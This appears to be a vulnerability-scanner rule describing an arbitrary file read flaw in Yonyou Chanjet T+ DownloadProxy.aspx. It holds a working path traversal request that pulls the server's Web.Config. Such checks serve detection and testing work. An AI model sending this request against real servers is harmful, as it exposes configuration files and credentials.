漏洞描述
用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件
app="畅捷通-TPlus"
id: yonyou-chanjet-tplus-read-file
info:
name: 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
author: 123456
severity: critical
description: |
用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件
app="畅捷通-TPlus"
reference:
- http://wiki.peiqi.tech/wiki/webapp/%E7%94%A8%E5%8F%8B/%E7%94%A8%E5%8F%8B%20%E7%95%85%E6%8D%B7%E9%80%9AT+%20DownloadProxy.aspx%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
rules:
r0:
request:
method: GET
path: /tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config
expression: response.status == 200 && response.body.bcontains(b'<?xml') && response.body.bcontains(b'<configuration>')
expression: r0()